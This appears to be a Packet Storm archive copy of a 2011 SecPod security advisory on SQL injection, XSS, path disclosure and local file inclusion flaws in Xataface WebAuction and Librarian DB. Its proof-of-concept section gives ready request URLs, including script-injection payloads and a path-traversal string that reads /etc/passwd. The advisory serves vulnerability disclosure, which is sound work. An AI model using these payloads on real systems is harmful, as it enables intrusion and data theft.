exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Xataface WebAuction / Librarian DB XSS / LFI / SQL Injection

Xataface WebAuction / Librarian DB XSS / LFI / SQL Injection
Posted Sep 9, 2011
Authored by Antu Sanadi | Site secpod.com

Xataface WebAuction versions 0.3.6 and below and Xataface Librarian DB versions 0.2 and below suffer from cross site scripting, local file inclusion, and remote SQL injection vulnerabilities.

tags | exploit, remote, local, vulnerability, xss, sql injection, file inclusion
SHA-256 | eeb1be34f9b3ea62cad720ef286c45c943798050461a867a2c199ec66f0143b6

Xataface WebAuction / Librarian DB XSS / LFI / SQL Injection

Change Mirror Download
##############################################################################
#
# Title : Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities.
# Author : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor : https://xataface.com/
# Advisory : https://secpod.org/blog/?p=350
# https://secpod.org/advisories/SECPOD_Xataface_Webauction_Mult_Vuln.txt
# Software : Xataface WebAuction v0.3.6 and prior,
# Xataface Librarian DB v0.2 and prior.
# Date : 09/07/2011
#
###############################################################################

SecPod ID: 1024 21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
No Response from Vendor
07/09/2011 Advisory Released

Class: Multiple Vulnerabilities Severity: High


Overview:
---------
Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities.


Technical Description:
----------------------
Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities.

i) Input passed via the '-action' parameter in 'index.php' is not properly
verified. This can be exploited to read complete installation path.

ii) Input passed via the 'list&-table' and '-action' parameter in 'index.php'
page is not properly verified before being used in an SQL query. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL queries.

iii) Input passed via the '-action' nad 'list&-table' parameter in 'index.php'
page is not properly verified before it is returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.

iV) Input passed via the 'list&-lang' and '-table' parameter in 'index.php'
page is not properly verified before it is returned to the user. This
can be exploited to execute arbitrary HTML and script code in a user's
browser session in the context of a vulnerable site.

V) Input passed via the 'list&-lang' parameter in 'index.php' is not
properly verified beofore using it to include files. This can be
exploited to include arbitrary files from external and local resources.

The vulnerabilities are tested in Xataface WebAuction v0.3.6,
Xataface WebAuction v0.3.5, Xataface Librarian DB v0.2 and
Xataface Librarian DB v0.1.3. Other versions may also be affected.


Impact:
--------
Successful exploitation could allow an attacker to execute arbitrary HTML
code in a user's browser session in the context of a vulnerable application
or to manipulate SQL queries by injecting arbitrary SQL code or to include
arbitrary files from external and local resources.


Affected Software:
------------------
Xataface WebAuction v0.3.6 and prior,
Xataface Librarian DB v0.2 and prior.


Tested on,
Xataface WebAuction v0.3.6,
Xataface WebAuction v0.3.5,
Xataface Librarian DB v0.2,
Xataface Librarian DB v0.1.3


References:
-----------
https://xataface.com/
https://secpod.org/blog/?p=350
https://sourceforge.net/projects/librariandb/
https://sourceforge.net/projects/webauction/files/webauction/
https://secpod.org/blog/?p=350
https://secpod.org/advisories/SECPOD_Xataface_Webauction_Mult_Vuln.txt


Proof of Concept:
-----------------

POC 1:
-----
Full Path Disclosure Vulnerability

https://IP_ADDR/webauction/index.php?-action=%27
https://IP_ADDR/librariandb/index.php?-action=%27

POC 2:
-----
SQL Injection Vulnerabilities.

https://IP_ADDR/webauction/index.php?-table=%27
https://IP_ADDR/webauction/index.php?-action=list&-table=%27
https://IP_ADDR/librariandb/index.php?-table=%27
https://IP_ADDR/librariandb/index.php?-action=list&-table=%27

POC 3:
-----
Cross Site Scripting Vulnerabilities.

https://IP_ADDR/webauction/index.php?-action=list&-table=%3Cscript%3Ealert
%28%22SecPod-XSS-TEST%22%29%3C/script%3E

https://IP_ADDR/webauction/index.php?-table=books&-action=browse_by_cat&-cursor
=0&-skip=0&-limit=30&-mode=list&-lang=%27%3Cscript%3Ealert%28%22SecPod-XSS-TEST
%22%29%3C/script%3E
Vist : https://IP_ADDR/webauction/index.php to see execut injected code

https://IP_ADDR/librariandb/index.php?-action=list&-table=%3Cscript%3Ealert%28
%22SecPod-XSS-TEST%22%29%3C/script%3E

https://IP_ADDR/librariandb/index.php?-table=books&-action=browse_by_cat&-cursor
=0&-skip=0&-limit=30&-mode=list&-lang=%27%3Cscript%3Ealert%28%22SecPod-XSS-TEST
%22%29%3C/script%3E

POC 4:
-----
Local File Inclusion Vulnerability.

https://IP_ADDR/webauction/index.php?-table=books&-action=browse_by_cat&-cursor
=0&-skip=0&-limit=30&-mode=list&-lang=../../../../../../../../../etc/passwd%00
Vist : https://IP_ADDR/webauction/index.php to see the content of "/etc/passwd"
file


https://IP_ADDR/librariandb/index.php?-table=books&-action=browse_by_cat&-cursor
=0&-skip=0&-limit=30&-mode=list&-lang=../../../../../../../../../etc/passwd%00


Solution:
----------
Fix not available


Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:P/I:P/A:N)


Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close